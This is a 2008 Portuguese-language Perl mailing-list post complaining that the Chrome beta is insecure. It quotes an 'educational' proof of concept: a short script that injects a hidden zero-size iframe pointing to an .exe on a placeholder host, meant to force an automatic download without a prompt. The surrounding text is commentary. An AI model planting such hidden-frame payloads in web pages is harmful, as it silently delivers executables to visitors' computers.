[Rio-pm] [OT] Chrome

[Daniel de Oliveira Mantovani]

Um navegador novo de uma empresa privada com códigos "gigantescos". Bom mas
afinal é "Beta", e se fomos comparar com outros produtos como o Orkut, que
tem uns 10 anos, e ainda é Beta.
O pior de tudo que a grande massa que baixou, baixa o navegador e está
usando ele, não sabe que ele está vulnerável, Crackers podem por exemplo
invadir um site e por apenas o código. Assim a pessoa entra no seu site
diário e arquivos maliciosos serão baixados na sua máquina, sendo que esse é
uma vulnerabilidade que eles divulgaram isso no primeiro dia, imagina as
quais eles não divulgaram.


2008/9/4 Daniel de Oliveira Mantovani <daniel.oliveira.mantovani em gmail.com>

> E já vulnerável, não é atoa que saiu pra Ruimwindows pois o navegador é
> digno de tal.
>
> "
>
> Author: nerex
>  E-mail: nerex[at]live[dot]com
>
>  Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
>
>  downloaded to the user's computer without any user prompt.
>
>  This proof-of-concept was created for educational purposes only.
>  Use the code it at your own risk.
>  The author will not be responsible for any damages.
>
>  Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
> **************************************************************************
> <script>
> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');"
>
> </script>"
>
>


-- 
Daniel de Oliveira Mantovani
"A sede pelo aprendizado é insaciável"
http://mantovanihouse.blogspot.com/
------------------------------------------------------------
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://mail.pm.org/pipermail/rio-pm/attachments/20080904/787edf03/attachment.html>